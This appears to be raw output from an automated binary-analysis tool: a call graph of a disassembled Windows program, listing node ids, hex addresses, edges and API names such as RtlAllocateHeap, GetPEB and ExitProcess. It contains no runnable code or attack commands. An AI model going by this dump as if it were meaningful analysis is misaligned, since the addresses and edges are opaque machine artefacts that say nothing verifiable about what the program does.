9912 be7a81 9909->9912 9910->9887 9913 be7ab9 9911->9913 9914 be7a69 9911->9914 9917 bed3e2 RtlAllocateHeap 9912->9917 9919 be7a76 __cftof 9912->9919 9915 bd2480 RtlAllocateHeap 9913->9915 9916 bed3e2 RtlAllocateHeap 9914->9916 9918 be7a6f 9915->9918 9916->9918 9917->9919 9918->9919 9920 c06c6a RtlAllocateHeap 9918->9920 9919->9887 9921 be7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9920->9921 9921->9887 9976 bd5940 9922->9976 9924 bd5c54 9979 bd4b30 9924->9979 9926 bd5c7b shared_ptr 9927 bd5d17 shared_ptr std::invalid_argument::invalid_argument 9926->9927 9928 c06c6a RtlAllocateHeap 9926->9928 9927->9889 9929 bd5d47 __cftof 9928->9929 9929->9929 9930 be80c0 RtlAllocateHeap 9929->9930 9932 bd5e3e 9930->9932 9931 bd5ea6 shared_ptr std::invalid_argument::invalid_argument 9931->9889 9932->9931 9933 c06c6a RtlAllocateHeap 9932->9933 9934 bd5ed2 9933->9934 9935 bd5ffe shared_ptr std::invalid_argument::invalid_argument 9934->9935 9936 c06c6a RtlAllocateHeap 9934->9936 9935->9889 9937 bd601b 9936->9937 9938 be80c0 RtlAllocateHeap 9937->9938 9939 bd6089 9938->9939 9940 be80c0 RtlAllocateHeap 9939->9940 9941 bd60bd 9940->9941 9942 be80c0 RtlAllocateHeap 9941->9942 9943 bd60ee 9942->9943 9944 be80c0 RtlAllocateHeap 9943->9944 9945 bd611f 9944->9945 9946 be80c0 RtlAllocateHeap 9945->9946 9948 bd6150 9946->9948 9947 bd65b1 shared_ptr std::invalid_argument::invalid_argument 9947->9889 9948->9947 9949 c06c6a RtlAllocateHeap 9948->9949 9950 bd65dc 9949->9950 9951 be7a00 RtlAllocateHeap 9950->9951 9952 bd66a6 9951->9952 9953 bd5c10 4 API calls 9952->9953 9954 bd66ac 9953->9954 9955 bd5c10 4 API calls 9954->9955 9956 bd66b1 9955->9956 9957 bd22c0 4 API calls 9956->9957 9958 bd66c9 shared_ptr 9957->9958 9959 be7a00 RtlAllocateHeap 9958->9959 9960 bd6732 9959->9960 9961 bd5c10 4 API calls 9960->9961 9962 bd673d 9961->9962 9963 bd22c0 4 API calls 9962->9963 9972 bd6757 shared_ptr 9963->9972 9964 bd6852 9965 be80c0 RtlAllocateHeap 9964->9965 9967 bd689c 9965->9967 9966 be7a00 RtlAllocateHeap 9966->9972 9968 be80c0 RtlAllocateHeap 9967->9968 9971 bd68e3 shared_ptr std::invalid_argument::invalid_argument 9968->9971 9969 bd5c10 4 API calls 9969->9972 9970 bd22c0 4 API calls 9970->9972 9971->9889 9972->9964 9972->9966 9972->9969 9972->9970 10194 bd2280 9973->10194 9986 be7f80 9976->9986 9978 bd596b 9978->9924 9980 bd4dc2 9979->9980 9984 bd4b92 9979->9984 9980->9926 9982 bd4ce5 9982->9980 9983 be8ca0 RtlAllocateHeap 9982->9983 9983->9982 9984->9982 10001 c06da6 9984->10001 10006 be8ca0 9984->10006 9989 be7fc7 9986->9989 9990 be7f9e __cftof 9986->9990 9987 be80b3 9988 be9270 RtlAllocateHeap 9987->9988 9991 be80b8 9988->9991 9989->9987 9993 be801b 9989->9993 9994 be803e 9989->9994 9990->9978 9992 bd2480 RtlAllocateHeap 9991->9992 9995 be80bd 9992->9995 9993->9991 9996 bed3e2 RtlAllocateHeap 9993->9996 9997 bed3e2 RtlAllocateHeap 9994->9997 9998 be802c __cftof 9994->9998 9996->9998 9997->9998 9999 be8095 shared_ptr 9998->9999 10000 c06c6a RtlAllocateHeap 9998->10000 9999->9978 10000->9987 10002 c06db4 10001->10002 10004 c06dc2 10001->10004 10021 c06d19 10002->10021 10004->9984 10007 be8dc9 10006->10007 10008 be8cc3 10006->10008 10009 be9270 RtlAllocateHeap 10007->10009 10012 be8d2f 10008->10012 10013 be8d05 10008->10013 10010 be8dce 10009->10010 10011 bd2480 RtlAllocateHeap 10010->10011 10019 be8d16 __cftof 10011->10019 10017 bed3e2 RtlAllocateHeap 10012->10017 10012->10019 10013->10010 10014 be8d10 10013->10014 10016 bed3e2 RtlAllocateHeap 10014->10016 10015 c06c6a RtlAllocateHeap 10018 be8dd8 10015->10018 10016->10019 10017->10019 10019->10015 10020 be8d8b shared_ptr __cftof 10019->10020 10020->9984 10026 c0690a 10021->10026 10025 c06d3d 10025->9984 10027 c0692a 10026->10027 10028 c06921 10026->10028 10027->10028 10040 c0a671 10027->10040 10034 c06d52 10028->10034 10035 c06d8f 10034->10035 10037 c06d5f 10034->10037 10178 c0b67d 10035->10178 10038 c06d6e 10037->10038 10173 c0b6a1 10037->10173 10038->10025 10041 c0a67b __dosmaperr 10040->10041 10042 c0d82f __dosmaperr RtlAllocateHeap 10041->10042 10043 c0a694 10041->10043 10045 c0a6bc __dosmaperr 10042->10045 10044 c0694a 10043->10044 10062 c08bec 10043->10062 10054 c0b5fb 10044->10054 10047 c0a6c4 __dosmaperr 10045->10047 10048 c0a6fc 10045->10048 10049 c0adf5 ___free_lconv_mon RtlAllocateHeap 10047->10049 10051 c0a49f __dosmaperr RtlAllocateHeap 10048->10051 10049->10043 10052 c0a707 10051->10052 10053 c0adf5 ___free_lconv_mon RtlAllocateHeap 10052->10053 10053->10043 10055 c06960 10054->10055 10056 c0b60e 10054->10056 10058 c0b628 10055->10058 10056->10055 10095 c0f5ab 10056->10095 10059 c0b63b 10058->10059 10061 c0b650 10058->10061 10059->10061 10108 c0e6b1 10059->10108 10061->10028 10063 c08bf1 __cftof 10062->10063 10067 c08bfc __cftof 10063->10067 10068 c0d634 10063->10068 10089 c065ed 10067->10089 10069 c0d640 __cftof 10068->10069 10070 c0a7c8 __dosmaperr RtlAllocateHeap 10069->10070 10072 c0d667 __cftof 10069->10072 10076 c0d66d __cftof 10069->10076 10070->10072 10071 c0d6b2 10073 c075f6 __dosmaperr RtlAllocateHeap 10071->10073 10072->10071 10072->10076 10088 c0d69c 10072->10088 10074 c0d6b7 10073->10074 10075 c06c5a __cftof RtlAllocateHeap 10074->10075 10075->10088 10077 c0d726 10076->10077 10078 c0d81b __cftof 10076->10078 10080 c0d751 __cftof 10076->10080 10077->10080 10092 c0d62b 10077->10092 10079 c065ed __cftof 3 API calls 10078->10079 10082 c0d82e 10079->10082 10084 c0a671 __cftof 4 API calls 10080->10084 10086 c0d7a5 10080->10086 10080->10088 10084->10086 10085 c0d62b __cftof 4 API calls 10085->10080 10087 c0a671 __cftof 4 API calls 10086->10087 10086->10088 10087->10088 10088->10067 10090 c064c7 __cftof 3 API calls 10089->10090 10091 c065fe 10090->10091 10093 c0a671 __cftof 4 API calls 10092->10093 10094 c0d630 10093->10094 10094->10085 10096 c0f5b7 __cftof 10095->10096 10097 c0a671 __cftof 4 API calls 10096->10097 10099 c0f5c0 __cftof 10097->10099 10098 c0f606 10098->10055 10099->10098 10104 c0f62c 10099->10104 10101 c0f5ef __cftof 10101->10098 10102 c08bec __cftof 4 API calls 10101->10102 10103 c0f62b 10102->10103 10105 c0f63a __dosmaperr 10104->10105 10107 c0f647 10104->10107 10106 c0f35f __dosmaperr RtlAllocateHeap 10105->10106 10105->10107 10106->10107 10107->10101 10109 c0a671 __cftof 4 API calls 10108->10109 10110 c0e6bb 10109->10110 10113 c0e5c9 10110->10113 10112 c0e6c1 10112->10061 10115 c0e5d5 __cftof 10113->10115 10114 c0e5f6 10114->10112 10116 c0e5ef __cftof 10115->10116 10120 c0adf5 ___free_lconv_mon RtlAllocateHeap 10115->10120 10116->10114 10117 c08bec __cftof 4 API calls 10116->10117 10118 c0e668 10117->10118 10123 c0e6a4 10118->10123 10124 c0a72e 10118->10124 10120->10116 10123->10112 10125 c0a739 __dosmaperr 10124->10125 10126 c0d82f __dosmaperr RtlAllocateHeap 10125->10126 10137 c0a745 10125->10137 10128 c0a769 __dosmaperr 10126->10128 10127 c08bec __cftof 4 API calls 10129 c0a7c7 10127->10129 10131 c0a7a5 10128->10131 10132 c0a771 __dosmaperr 10128->10132 10130 c0a7be 10138 c0e4b0 10130->10138 10133 c0a49f __dosmaperr RtlAllocateHeap 10131->10133 10134 c0adf5 ___free_lconv_mon RtlAllocateHeap 10132->10134 10135 c0a7b0 10133->10135 10134->10137 10136 c0adf5 ___free_lconv_mon RtlAllocateHeap 10135->10136 10136->10137 10137->10127 10137->10130 10139 c0e5c9 __cftof 4 API calls 10138->10139 10140 c0e4c3 10139->10140 10157 c0e259 10140->10157 10143 c0e4dc 10143->10123 10147 c0e512 10149 c0e51a 10147->10149 10153 c0e535 __cftof 10147->10153 10148 c0adf5 ___free_lconv_mon RtlAllocateHeap 10150 c0e52d 10148->10150 10151 c075f6 __dosmaperr RtlAllocateHeap 10149->10151 10150->10123 10156 c0e51f 10151->10156 10152 c0e561 10152->10156 10169 c0e14b 10152->10169 10153->10152 10154 c0adf5 ___free_lconv_mon RtlAllocateHeap 10153->10154 10154->10152 10156->10148 10158 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10157->10158 10159 c0e26b 10158->10159 10159->10143 10160 c0b04b 10159->10160 10162 c0b059 __dosmaperr 10160->10162 10161 c075f6 __dosmaperr RtlAllocateHeap 10163 c0b087 10161->10163 10162->10161 10162->10163 10163->10156 10164 c0e6c4 10163->10164 10165 c0e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10164->10165 10166 c0e6e4 __cftof 10165->10166 10167 c0e75a __cftof std::invalid_argument::invalid_argument 10166->10167 10168 c0e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10166->10168 10167->10147 10168->10167 10170 c0e157 __cftof 10169->10170 10171 c0e198 __cftof RtlAllocateHeap 10170->10171 10172 c0e16e __cftof 10171->10172 10172->10156 10174 c0690a __cftof 4 API calls 10173->10174 10175 c0b6be 10174->10175 10177 c0b6ce std::invalid_argument::invalid_argument 10175->10177 10183 c0f1bf 10175->10183 10177->10038 10179 c0a671 __cftof 4 API calls 10178->10179 10180 c0b688 10179->10180 10181 c0b5fb __cftof 4 API calls 10180->10181 10182 c0b698 10181->10182 10182->10038 10184 c0690a __cftof 4 API calls 10183->10184 10185 c0f1df __cftof 10184->10185 10186 c0b04b __cftof RtlAllocateHeap 10185->10186 10188 c0f29d std::invalid_argument::invalid_argument 10185->10188 10189 c0f232 __cftof 10185->10189 10186->10189 10188->10177 10190 c0f2c2 10189->10190 10191 c0f2df 10190->10191 10192 c0f2ce 10190->10192 10191->10188 10192->10191 10193 c0adf5 ___free_lconv_mon RtlAllocateHeap 10192->10193 10193->10191 10195 bd2296 10194->10195 10198 c087f8 10195->10198 10201 c07609 10198->10201 10200 bd22a4 10200->9893 10202 c07631 10201->10202 10203 c07649 10201->10203 10204 c075f6 __dosmaperr RtlAllocateHeap 10202->10204 10203->10202 10205 c07651 10203->10205 10206 c07636 10204->10206 10207 c0690a __cftof 4 API calls 10205->10207 10208 c06c5a __cftof RtlAllocateHeap 10206->10208 10209 c07661 10207->10209 10210 c07641 std::invalid_argument::invalid_argument 10208->10210 10214 c07bc4 10209->10214 10210->10200 10230 c0868d 10214->10230 10216 c076e8 10227 c07a19 10216->10227 10217 c07be4 10218 c075f6 __dosmaperr RtlAllocateHeap 10217->10218 10219 c07be9 10218->10219 10220 c06c5a __cftof RtlAllocateHeap 10219->10220 10220->10216 10221 c07bd5 10221->10216 10221->10217 10237 c07d15 10221->10237 10245 c08168 10221->10245 10250 c07dc2 10221->10250 10255 c07de8 10221->10255 10284 c07f36 10221->10284 10228 c0adf5 ___free_lconv_mon RtlAllocateHeap 10227->10228 10229 c07a29 10228->10229 10229->10210 10231 c08692 10230->10231 10232 c086a5 10230->10232 10233 c075f6 __dosmaperr RtlAllocateHeap 10231->10233 10232->10221 10234 c08697 10233->10234 10235 c06c5a __cftof RtlAllocateHeap 10234->10235 10236 c086a2 10235->10236 10236->10221 10306 c07d34 10237->10306 10239 c07d1a 10240 c07d31 10239->10240 10241 c075f6 __dosmaperr RtlAllocateHeap 10239->10241 10240->10221 10242 c07d23 10241->10242 10243 c06c5a __cftof RtlAllocateHeap 10242->10243 10244 c07d2e 10243->10244 10244->10221 10246 c08171 10245->10246 10247 c08178 10245->10247 10315 c07b50 10246->10315 10247->10221 10251 c07dcb 10250->10251 10253 c07dd2 10250->10253 10252 c07b50 4 API calls 10251->10252 10254 c07dd1 10252->10254 10253->10221 10254->10221 10256 c07e09 10255->10256 10257 c07def 10255->10257 10260 c075f6 __dosmaperr RtlAllocateHeap 10256->10260 10279 c07e39 10256->10279 10258 c07fbb 10257->10258 10259 c07f4f 10257->10259 10257->10279 10263 c08001 10258->10263 10264 c07fc2 10258->10264 10273 c07f92 10258->10273 10269 c07f5b 10259->10269 10259->10273 10261 c07e25 10260->10261 10262 c06c5a __cftof RtlAllocateHeap 10261->10262 10265 c07e30 10262->10265 10380 c08604 10263->10380 10267 c07fc7 10264->10267 10268 c07f69 10264->10268 10265->10221 10267->10273 10275 c07fcc 10267->10275 10274 c07f8b 10268->10274 10283 c07f77 10268->10283 10374 c08241 10268->10374 10269->10268 10272 c07fa2 10269->10272 10269->10283 10272->10274 10351 c08390 10272->10351 10273->10274 10273->10283 10365 c08420 10273->10365 10274->10221 10276 c07fd1 10275->10276 10277 c07fdf 10275->10277 10276->10274 10355 c085e5 10276->10355 10359 c08571 10277->10359 10279->10221 10283->10274 10383 c086ea 10283->10383 10285 c07fbb 10284->10285 10286 c07f4f 10284->10286 10287 c08001 10285->10287 10288 c07fc2 10285->10288 10293 c07f92 10285->10293 10286->10293 10295 c07f5b 10286->10295 10291 c08604 RtlAllocateHeap 10287->10291 10289 c07fc7 10288->10289 10290 c07f69 10288->10290 10289->10293 10298 c07fcc 10289->10298 10294 c07f8b 10290->10294 10297 c08241 4 API calls 10290->10297 10304 c07f77 10290->10304 10291->10304 10292 c07fa2 10292->10294 10301 c08390 4 API calls 10292->10301 10293->10294 10296 c08420 RtlAllocateHeap 10293->10296 10293->10304 10294->10221 10295->10290 10295->10292 10295->10304 10296->10304 10297->10304 10299 c07fdf 10298->10299 10302 c07fd1 10298->10302 10300 c08571 RtlAllocateHeap 10299->10300 10300->10304 10301->10304 10302->10294 10303 c085e5 RtlAllocateHeap 10302->10303 10303->10304 10304->10294 10305 c086ea 4 API calls 10304->10305 10305->10294 10309 c07d5e 10306->10309 10308 c07d40 10308->10239 10310 c07d80 10309->10310 10311 c07db7 10310->10311 10312 c075f6 __dosmaperr RtlAllocateHeap 10310->10312 10311->10308 10313 c07dac 10312->10313 10314 c06c5a __cftof RtlAllocateHeap 10313->10314 10314->10311 10316 c07b62 10315->10316 10317 c07b67 10315->10317 10318 c075f6 __dosmaperr RtlAllocateHeap 10316->10318 10323 c08ab6 10317->10323 10318->10317 10321 c07b99 10321->10221 10322 c075f6 __dosmaperr RtlAllocateHeap 10322->10321 10324 c08ad1 10323->10324 10327 c08868 10324->10327 10328 c0868d RtlAllocateHeap 10327->10328 10331 c0887a 10328->10331 10329 c088b3 10330 c0690a __cftof 4 API calls 10329->10330 10337 c088bf 10330->10337 10331->10329 10332 c0888f 10331->10332 10344 c07b85 10331->10344 10333 c075f6 __dosmaperr RtlAllocateHeap 10332->10333 10334 c08894 10333->10334 10336 c06c5a __cftof RtlAllocateHeap 10334->10336 10335 c06d52 4 API calls 10335->10337 10336->10344 10337->10335 10338 c088ee 10337->10338 10341 c08958 10338->10341 10345 c08a8d 10338->10345 10339 c08a8d RtlAllocateHeap 10342 c08a20 10339->10342 10341->10339 10343 c075f6 __dosmaperr RtlAllocateHeap 10342->10343 10342->10344 10343->10344 10344->10321 10344->10322 10346 c08ab2 10345->10346 10347 c08a9e 10345->10347 10346->10341 10347->10346 10348 c075f6 __dosmaperr RtlAllocateHeap 10347->10348 10349 c08aa7 10348->10349 10350 c06c5a __cftof RtlAllocateHeap 10349->10350 10350->10346 10353 c083ab 10351->10353 10352 c083dd 10352->10283 10353->10352 10387 c0c88e 10353->10387 10356 c085f1 10355->10356 10357 c08420 RtlAllocateHeap 10356->10357 10358 c08603 10357->10358 10358->10283 10360 c08586 10359->10360 10361 c075f6 __dosmaperr RtlAllocateHeap 10360->10361 10364 c0859a 10360->10364 10362 c0858f 10361->10362 10363 c06c5a __cftof RtlAllocateHeap 10362->10363 10363->10364 10364->10283 10366 c08433 10365->10366 10367 c0844e 10366->10367 10369 c08465 10366->10369 10368 c075f6 __dosmaperr RtlAllocateHeap 10367->10368 10370 c08453 10368->10370 10373 c0845e 10369->10373 10415 c0779f 10369->10415 10372 c06c5a __cftof RtlAllocateHeap 10370->10372 10372->10373 10373->10283 10375 c0825a 10374->10375 10376 c0779f RtlAllocateHeap 10375->10376 10377 c08297 10376->10377 10428 c0d3c8 10377->10428 10379 c0830d 10379->10283 10381 c08420 RtlAllocateHeap 10380->10381 10382 c0861b 10381->10382 10382->10283 10384 c0875d std::invalid_argument::invalid_argument 10383->10384 10386 c08707 10383->10386 10384->10274 10385 c0c88e __cftof 4 API calls 10385->10386 10386->10384 10386->10385 10390 c0c733 10387->10390 10391 c0c743 10390->10391 10392 c0c781 10391->10392 10393 c0c76d 10391->10393 10402 c0c748 10391->10402 10395 c0690a __cftof 4 API calls 10392->10395 10394 c075f6 __dosmaperr RtlAllocateHeap 10393->10394 10396 c0c772 10394->10396 10397 c0c78c 10395->10397 10398 c06c5a __cftof RtlAllocateHeap 10396->10398 10399 c0c79c 10397->10399 10403 c0c7c8 __cftof 10397->10403 10398->10402 10411 c12b7d 10399->10411 10402->10352 10407 c0c7de __cftof 10403->10407 10410 c0c815 __cftof 10403->10410 10404 c075f6 __dosmaperr RtlAllocateHeap 10404->10402 10405 c075f6 __dosmaperr RtlAllocateHeap 10405->10402 10406 c075f6 __dosmaperr RtlAllocateHeap 10408 c0c87f 10406->10408 10407->10402 10407->10404 10409 c06c5a __cftof RtlAllocateHeap 10408->10409 10409->10402 10410->10402 10410->10406 10412 c12b98 10411->10412 10413 c0c7b1 10411->10413 10412->10413 10414 c12c28 __cftof RtlAllocateHeap 10412->10414 10413->10402 10413->10405 10414->10413 10416 c077c3 10415->10416 10417 c077b4 10415->10417 10419 c077b9 10416->10419 10420 c0b04b __cftof RtlAllocateHeap 10416->10420 10418 c075f6 __dosmaperr RtlAllocateHeap 10417->10418 10418->10419 10419->10373 10421 c077ea 10420->10421 10422 c07801 10421->10422 10425 c07a33 10421->10425 10424 c0adf5 ___free_lconv_mon RtlAllocateHeap 10422->10424 10424->10419 10426 c0adf5 ___free_lconv_mon RtlAllocateHeap 10425->10426 10427 c07a42 10426->10427 10427->10422 10429 c0d3d8 10428->10429 10430 c0d3ee 10428->10430 10431 c075f6 __dosmaperr RtlAllocateHeap 10429->10431 10430->10429 10434 c0d400 10430->10434 10432 c0d3dd 10431->10432 10433 c06c5a __cftof RtlAllocateHeap 10432->10433 10447 c0d3e7 10433->10447 10436 c0d467 10434->10436 10437 c0d439 10434->10437 10435 c0d485 10439 c0d4e4 10435->10439 10440 c0d4ae 10435->10440 10436->10435 10438 c0d48a 10436->10438 10449 c0d2ff 10437->10449 10454 c0cbdf 10438->10454 10482 c0cef8 10439->10482 10442 c0d4b3 10440->10442 10443 c0d4cc 10440->10443 10465 c0d23e 10442->10465 10475 c0d0e2 10443->10475 10447->10379 10450 c0d320 10449->10450 10451 c0d315 10449->10451 10452 c0a1f1 ___std_exception_copy RtlAllocateHeap 10450->10452 10451->10447 10453 c0d37b __cftof 10452->10453 10453->10447 10455 c0cbf1 10454->10455 10456 c0690a __cftof 4 API calls 10455->10456 10457 c0cc05 10456->10457 10458 c0cc21 10457->10458 10459 c0cc0d 10457->10459 10461 c0cef8 4 API calls 10458->10461 10464 c0cc1c __alldvrm __cftof _strrchr 10458->10464 10460 c075f6 __dosmaperr RtlAllocateHeap 10459->10460 10462 c0cc12 10460->10462 10461->10464 10463 c06c5a __cftof RtlAllocateHeap 10462->10463 10463->10464 10464->10447 10490 c131a8 10465->10490 10467 c0d26c 10524 c12c47 10467->10524 10469 c0d29e 10470 c0d2de 10469->10470 10472 c0d2b7 10469->10472 10474 c0d2a5 10469->10474 10536 c0cf9a 10470->10536 10533 c0d16d 10472->10533 10474->10447 10476 c131a8 RtlAllocateHeap 10475->10476 10477 c0d10f 10476->10477 10478 c12c47 RtlAllocateHeap 10477->10478 10479 c0d147 10478->10479 10480 c0d14e 10479->10480 10481 c0d16d 4 API calls 10479->10481 10480->10447 10481->10480 10483 c0cf10 10482->10483 10484 c131a8 RtlAllocateHeap 10483->10484 10485 c0cf29 10484->10485 10486 c12c47 RtlAllocateHeap 10485->10486 10487 c0cf6e 10486->10487 10488 c0cf75 10487->10488 10489 c0cf9a 4 API calls 10487->10489 10488->10447 10489->10488 10493 c131db 10490->10493 10491 c0a1f1 ___std_exception_copy RtlAllocateHeap 10494 c1448b __cftof std::invalid_argument::invalid_argument 10491->10494 10492 c13250 10492->10491 10493->10492 10495 c132a7 10493->10495 10494->10467 10496 c16560 RtlAllocateHeap 10495->10496 10497 c1331e 10496->10497 10498 c16670 __floor_pentium4 RtlAllocateHeap 10497->10498 10499 c13328 10498->10499 10500 c135a2 10499->10500 10502 c133cc 10499->10502 10504 c1362c __cftof 10499->10504 10501 c0bac8 __cftof RtlAllocateHeap 10500->10501 10500->10504 10501->10504 10503 c0bac8 __cftof RtlAllocateHeap 10502->10503 10505 c13456 10502->10505 10503->10505 10506 c0bac8 __cftof RtlAllocateHeap 10504->10506 10507 c0bac8 __cftof RtlAllocateHeap 10505->10507 10508 c1359a 10506->10508 10507->10508 10522 c13998 __cftof 10508->10522 10523 c13dec __cftof 10508->10523 10509 c1427d 10510 c12d10 RtlAllocateHeap 10509->10510 10516 c142c9 10510->10516 10511 c13d0c 10512 c13dda 10511->10512 10513 c0bac8 __cftof RtlAllocateHeap 10511->10513 10512->10509 10514 c0bac8 __cftof RtlAllocateHeap 10512->10514 10513->10512 10514->10509 10515 c0bac8 RtlAllocateHeap __cftof 10515->10522 10517 c0bac8 __cftof RtlAllocateHeap 10516->10517 10521 c14333 10516->10521 10517->10521 10518 c0bac8 RtlAllocateHeap __cftof 10518->10523 10519 c12d10 RtlAllocateHeap 10519->10521 10520 c0bac8 __cftof RtlAllocateHeap 10520->10521 10521->10494 10521->10519 10521->10520 10522->10511 10522->10515 10523->10511 10523->10518 10525 c12c54 10524->10525 10526 c12c6a 10524->10526 10527 c075f6 __dosmaperr RtlAllocateHeap 10525->10527 10532 c12c63 10525->10532 10526->10525 10528 c12c86 10526->10528 10531 c12c59 10527->10531 10530 c075f6 __dosmaperr RtlAllocateHeap 10528->10530 10529 c06c5a __cftof RtlAllocateHeap 10529->10532 10530->10531 10531->10529 10532->10469 10534 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10533->10534 10535 c0d183 __cftof 10534->10535 10535->10474 10537 c0cfab 10536->10537 10538 c0cfb9 10537->10538 10539 c0cfce 10537->10539 10540 c075f6 __dosmaperr RtlAllocateHeap 10538->10540 10541 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10539->10541 10542 c0cfbe 10540->10542 10545 c0cfda 10541->10545 10543 c06c5a __cftof RtlAllocateHeap 10542->10543 10544 c0cfc8 10543->10544 10544->10474 10546 c0a1f1 ___std_exception_copy RtlAllocateHeap 10545->10546 10547 c0d057 __cftof 10546->10547 10548 bd18a0 10549 be80c0 RtlAllocateHeap 10548->10549 10550 bd18b1 10549->10550 10553 bed64e 10550->10553 10556 bed621 10553->10556 10557 bed637 10556->10557 10558 bed630 10556->10558 10565 c098fa 10557->10565 10562 c0988e 10558->10562 10561 bd18bb 10563 c098fa RtlAllocateHeap 10562->10563 10564 c098a0 10563->10564 10564->10561 10568 c09630 10565->10568 10567 c0992b 10567->10561 10569 c0963c __cftof 10568->10569 10572 c0968b 10569->10572 10571 c09657 10571->10567 10573 c096a7 10572->10573 10581 c0971e __dosmaperr 10572->10581 10580 c096fe 10573->10580 10573->10581 10582 c0edf6 10573->10582 10574 c0edf6 RtlAllocateHeap 10576 c09714 10574->10576 10578 c0adf5 ___free_lconv_mon RtlAllocateHeap 10576->10578 10577 c096f4 10579 c0adf5 ___free_lconv_mon RtlAllocateHeap 10577->10579 10578->10581 10579->10580 10580->10574 10580->10581 10581->10571 10583 c0ee03 10582->10583 10584 c0ee1e 10582->10584 10583->10584 10585 c0ee0f 10583->10585 10586 c0ee2d 10584->10586 10591 c14fdc 10584->10591 10587 c075f6 __dosmaperr RtlAllocateHeap 10585->10587 10598 c1500f 10586->10598 10590 c0ee14 __cftof 10587->10590 10590->10577 10592 c14fe7 10591->10592 10593 c14ffc 10591->10593 10594 c075f6 __dosmaperr RtlAllocateHeap 10592->10594 10593->10586 10595 c14fec 10594->10595 10596 c06c5a __cftof RtlAllocateHeap 10595->10596 10597 c14ff7 10596->10597 10597->10586 10599 c15027 10598->10599 10600 c1501c 10598->10600 10602 c1502f 10599->10602 10606 c15038 __dosmaperr 10599->10606 10601 c0b04b __cftof RtlAllocateHeap 10600->10601 10603 c15024 10601->10603 10604 c0adf5 ___free_lconv_mon RtlAllocateHeap 10602->10604 10603->10590 10604->10603 10605 c075f6 __dosmaperr RtlAllocateHeap 10605->10603 10606->10603 10606->10605 10607 bd20a0 10612 bec68b 10607->10612 10610 bed64e RtlAllocateHeap 10611 bd20b6 10610->10611 10615 bec3d5 10612->10615 10614 bd20ac 10614->10610 10616 bec3eb 10615->10616 10617 bec3e1 10615->10617 10616->10614 10618 bec3be 10617->10618 10619 bec39e 10617->10619 10628 becd0a 10618->10628 10619->10616 10624 beccd5 10619->10624 10621 bec3d0 10621->10614 10625 becce3 InitializeCriticalSectionEx 10624->10625 10627 bec3b7 10624->10627 10625->10627 10627->10614 10629 becd1f RtlInitializeConditionVariable 10628->10629 10629->10621 10645 bd34a0 10646 bd34aa 10645->10646 10647 bd34ca shared_ptr 10645->10647 10646->10647 10648 c06c6a RtlAllocateHeap 10646->10648 10649 bd34f2 Concurrency::cancel_current_task shared_ptr 10648->10649 11763 bd5a9e 11766 bd5a61 11763->11766 11764 be80c0 RtlAllocateHeap 11764->11766 11766->11763 11766->11764 11767 be7a00 RtlAllocateHeap 11766->11767 11768 bd5bdd std::invalid_argument::invalid_argument 11766->11768 11769 bd5730 11766->11769 11767->11766 11773 bd5860 shared_ptr 11769->11773 11777 bd5799 shared_ptr 11769->11777 11770 bd592a 11772 be8200 RtlAllocateHeap 11770->11772 11771 be80c0 RtlAllocateHeap 11771->11777 11772->11773 11774 bd5900 shared_ptr std::invalid_argument::invalid_argument 11773->11774 11775 c06c6a RtlAllocateHeap 11773->11775 11774->11766 11776 bd5934 11775->11776 11777->11770 11777->11771 11777->11773 10657 c144f2 10658 c1450c 10657->10658 10659 c144ff 10657->10659 10662 c14518 10658->10662 10663 c075f6 __dosmaperr RtlAllocateHeap 10658->10663 10660 c075f6 __dosmaperr RtlAllocateHeap 10659->10660 10661 c14504 10660->10661 10664 c14539 10663->10664 10665 c06c5a __cftof RtlAllocateHeap 10664->10665 10665->10661 10666 bd3c8e 10667 bd3c98 10666->10667 10668 bd3cb4 10667->10668 10676 bd2410 10667->10676 10672 bd3ccf 10668->10672 10691 bd3810 10668->10691 10674 bd3810 4 API calls 10672->10674 10675 bd3cdb 10674->10675 10677 bd2424 10676->10677 10695 beb52d 10677->10695 10680 bd3ce0 10681 bd3d42 10680->10681 10683 bd3d52 10680->10683 10750 be7d50 10681->10750 10684 bed3e2 RtlAllocateHeap 10683->10684 10685 bd3d84 10684->10685 10686 be7d50 RtlAllocateHeap 10685->10686 10688 bd3e03 10685->10688 10686->10688 10687 bd3e9b shared_ptr 10687->10668 10688->10687 10689 c06c6a RtlAllocateHeap 10688->10689 10690 bd3ec1 10689->10690 10692 bd381c 10691->10692 10782 bd2440 10692->10782 10703 c03aed 10695->10703 10697 bd242a 10697->10680 10698 beb5a5 ___std_exception_copy 10710 beb1ad 10698->10710 10699 beb598 10706 beaf56 10699->10706 10714 c04f29 10703->10714 10705 beb555 10705->10697 10705->10698 10705->10699 10707 beaf9f ___std_exception_copy 10706->10707 10709 beafb2 shared_ptr 10707->10709 10726 beb39f 10707->10726 10709->10697 10711 beb1d8 10710->10711 10712 beb1e1 shared_ptr 10710->10712 10713 beb39f 5 API calls 10711->10713 10712->10697 10713->10712 10721 c04f37 10714->10721 10716 c04f2e __cftof 10716->10705 10717 c0d634 __cftof 4 API calls 10716->10717 10720 c08bfc __cftof 10716->10720 10717->10720 10718 c065ed __cftof 3 API calls 10719 c08c2f 10718->10719 10720->10718 10722 c04f40 10721->10722 10723 c04f43 10721->10723 10722->10716 10724 c08ba3 ___std_exception_destroy RtlAllocateHeap 10723->10724 10725 c04f77 10723->10725 10724->10725 10725->10716 10737 bebedf 10726->10737 10729 beb3e8 10729->10709 10746 becc31 10737->10746 10740 c06cbb 10741 c06cc7 __cftof 10740->10741 10742 c0a671 __cftof 4 API calls 10741->10742 10745 c06ccc 10742->10745 10743 c08bec __cftof 4 API calls 10744 c06cf6 10743->10744 10745->10743 10747 becc3f InitOnceExecuteOnce 10746->10747 10749 beb3e1 10746->10749 10747->10749 10749->10729 10749->10740 10751 be7dcb 10750->10751 10752 be7d62 10750->10752 10753 bd2480 RtlAllocateHeap 10751->10753 10754 be7d9c 10752->10754 10755 be7d6d 10752->10755 10756 be7d7a 10753->10756 10758 be7db9 10754->10758 10761 bed3e2 RtlAllocateHeap 10754->10761 10755->10751 10757 be7d74 10755->10757 10759 c06c6a RtlAllocateHeap 10756->10759 10763 be7d83 10756->10763 10760 bed3e2 RtlAllocateHeap 10757->10760 10758->10683 10768 be7dd5 10759->10768 10760->10756 10762 be7da6 10761->10762 